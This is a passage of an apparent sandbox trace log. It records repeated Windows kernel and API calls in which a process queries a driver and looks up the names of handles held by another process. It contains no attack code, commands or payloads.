lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0224.382] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.382] PsAcquireProcessExitSynchronization () returned 0x0 [0224.382] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.382] ObReferenceObjectByHandle (in: Handle=0x2e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037855f0, HandleInformation=0x0) returned 0x0 [0224.382] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.382] PsReleaseProcessExitSynchronization () returned 0x2 [0224.382] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.382] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.382] ObfDereferenceObject (Object=0xfffffa80037855f0) returned 0x1 [0224.382] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.382] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.382] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.382] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0224.383] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.383] PsAcquireProcessExitSynchronization () returned 0x0 [0224.383] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.383] ObReferenceObjectByHandle (in: Handle=0x32c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0010bbe70, HandleInformation=0x0) returned 0x0 [0224.383] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.383] PsReleaseProcessExitSynchronization () returned 0x2 [0224.383] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.383] ObQueryNameString (in: Object=0xfffff8a0010bbe70, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.383] ObfDereferenceObject (Object=0xfffff8a0010bbe70) returned 0x7 [0224.383] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.383] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.383] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.383] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0224.383] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.383] PsAcquireProcessExitSynchronization () returned 0x0 [0224.383] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.383] ObReferenceObjectByHandle (in: Handle=0x338, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0010bbe70, HandleInformation=0x0) returned 0x0 [0224.383] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.383] PsReleaseProcessExitSynchronization () returned 0x2 [0224.383] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.383] ObQueryNameString (in: Object=0xfffff8a0010bbe70, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.383] ObfDereferenceObject (Object=0xfffff8a0010bbe70) returned 0x7 [0224.383] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.383] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.383] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.383] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0224.383] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.383] PsAcquireProcessExitSynchronization () returned 0x0 [0224.383] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.383] ObReferenceObjectByHandle (in: Handle=0x340, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0010b4080, HandleInformation=0x0) returned 0x0 [0224.384] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.384] PsReleaseProcessExitSynchronization () returned 0x2 [0224.384] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.384] ObQueryNameString (in: Object=0xfffff8a0010b4080, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.384] ObfDereferenceObject (Object=0xfffff8a0010b4080) returned 0x2 [0224.384] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.384] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.384] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.384] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0224.384] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.384] PsAcquireProcessExitSynchronization () returned 0x0 [0224.384] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.384] ObReferenceObjectByHandle (in: Handle=0x348, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0010acda0, HandleInformation=0x0) returned 0x0 [0224.384] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.384] PsReleaseProcessExitSynchronization () returned 0x2 [0224.384] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.384] ObQueryNameString (in: Object=0xfffff8a0010acda0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.384] ObfDereferenceObject (Object=0xfffff8a0010acda0) returned 0x2 [0224.384] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.384] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.384] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.384] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0224.384] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.384] PsAcquireProcessExitSynchronization () returned 0x0 [0224.384] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.384] ObReferenceObjectByHandle (in: Handle=0x36c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037d5070, HandleInformation=0x0) returned 0x0 [0224.384] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.384] PsReleaseProcessExitSynchronization () returned 0x2 [0224.384] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.384] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.384] ObfDereferenceObject (Object=0xfffffa80037d5070) returned 0x1 [0224.385] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.385] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.385] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.385] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0224.385] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.385] PsAcquireProcessExitSynchronization () returned 0x0 [0224.385] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.385] ObReferenceObjectByHandle (in: Handle=0x394, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800380f5f0, HandleInformation=0x0) returned 0x0 [0224.385] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.385] PsReleaseProcessExitSynchronization () returned 0x2 [0224.385] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.385] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.385] ObfDereferenceObject (Object=0xfffffa800380f5f0) returned 0x1 [0224.385] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.385] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.385] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.385] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xf8, lpOverlapped=0x0) returned 1 [0224.385] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.385] PsAcquireProcessExitSynchronization () returned 0x0 [0224.385] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.385] ObReferenceObjectByHandle (in: Handle=0x404, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003876070, HandleInformation=0x0) returned 0x0 [0224.385] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.385] PsReleaseProcessExitSynchronization () returned 0x2 [0224.385] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.385] ObQueryNameString (in: Object=0xfffffa8003876070, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.385] ObfDereferenceObject (Object=0xfffffa8003876070) returned 0x2 [0224.385] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.386] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.386] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.386] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0224.386] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.386] PsAcquireProcessExitSynchronization () returned 0x0 [0224.386] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.386] ObReferenceObjectByHandle (in: Handle=0x408, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034ac2e0, HandleInformation=0x0) returned 0x0 [0224.386] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.386] PsReleaseProcessExitSynchronization () returned 0x2 [0224.386] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.386] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003070044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003070044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.386] ObfDereferenceObject (Object=0xfffffa80034ac2e0) returned 0x1 [0224.386] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.386] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.386] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.386] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0224.386] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.386] PsAcquireProcessExitSynchronization () returned 0x0 [0224.386] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.386] ObReferenceObjectByHandle (in: Handle=0x420, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001112640, HandleInformation=0x0) returned 0x0 [0224.386] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.386] PsReleaseProcessExitSynchronization () returned 0x2 [0224.386] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.386] ObQueryNameString (in: Object=0xfffff8a001112640, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.386] ObfDereferenceObject (Object=0xfffff8a001112640) returned 0x2 [0224.386] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.386] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.386] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.386] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0224.386] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.386] PsAcquireProcessExitSynchronization () returned 0x0 [0224.386] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.387] ObReferenceObjectByHandle (in: Handle=0x428, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000cac6d0, HandleInformation=0x0) returned 0x0 [0224.387] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.387] PsReleaseProcessExitSynchronization () returned 0x2 [0224.387] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.387] ObQueryNameString (in: Object=0xfffff8a000cac6d0, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.387] ObfDereferenceObject (Object=0xfffff8a000cac6d0) returned 0x2 [0224.387] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.387] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.387] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.387] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0224.387] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.387] PsAcquireProcessExitSynchronization () returned 0x0 [0224.387] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.387] ObReferenceObjectByHandle (in: Handle=0x430, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0010bbe70, HandleInformation=0x0) returned 0x0 [0224.387] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.387] PsReleaseProcessExitSynchronization () returned 0x2 [0224.387] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.387] ObQueryNameString (in: Object=0xfffff8a0010bbe70, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.387] ObfDereferenceObject (Object=0xfffff8a0010bbe70) returned 0x7 [0224.387] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.387] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.387] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.387] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0224.387] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.387] PsAcquireProcessExitSynchronization () returned 0x0 [0224.387] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.387] ObReferenceObjectByHandle (in: Handle=0x438, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0010bbe70, HandleInformation=0x0) returned 0x0 [0224.387] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.387] PsReleaseProcessExitSynchronization () returned 0x2 [0224.387] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.387] ObQueryNameString (in: Object=0xfffff8a0010bbe70, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.387] ObfDereferenceObject (Object=0xfffff8a0010bbe70) returned 0x7 [0224.387] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.388] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.388] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.388] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0224.388] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.388] PsAcquireProcessExitSynchronization () returned 0x0 [0224.388] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.388] ObReferenceObjectByHandle (in: Handle=0x440, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000caa290, HandleInformation=0x0) returned 0x0 [0224.388] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.388] PsReleaseProcessExitSynchronization () returned 0x2 [0224.388] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.388] ObQueryNameString (in: Object=0xfffff8a000caa290, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.388] ObfDereferenceObject (Object=0xfffff8a000caa290) returned 0x2 [0224.388] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.388] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.388] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.388] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xc6, lpOverlapped=0x0) returned 1 [0224.388] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.388] PsAcquireProcessExitSynchronization () returned 0x0 [0224.388] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.389] ObReferenceObjectByHandle (in: Handle=0x44c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037df070, HandleInformation=0x0) returned 0x0 [0224.389] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.389] PsReleaseProcessExitSynchronization () returned 0x2 [0224.389] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.389] ObQueryNameString (in: Object=0xfffffa80037df070, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.389] ObfDereferenceObject (Object=0xfffffa80037df070) returned 0x2 [0224.389] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.389] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.389] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.389] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xc6, lpOverlapped=0x0) returned 1 [0224.389] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.389] PsAcquireProcessExitSynchronization () returned 0x0 [0224.389] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.389] ObReferenceObjectByHandle (in: Handle=0x458, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003813070, HandleInformation=0x0) returned 0x0 [0224.389] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.389] PsReleaseProcessExitSynchronization () returned 0x2 [0224.389] ObfDereferenceObject 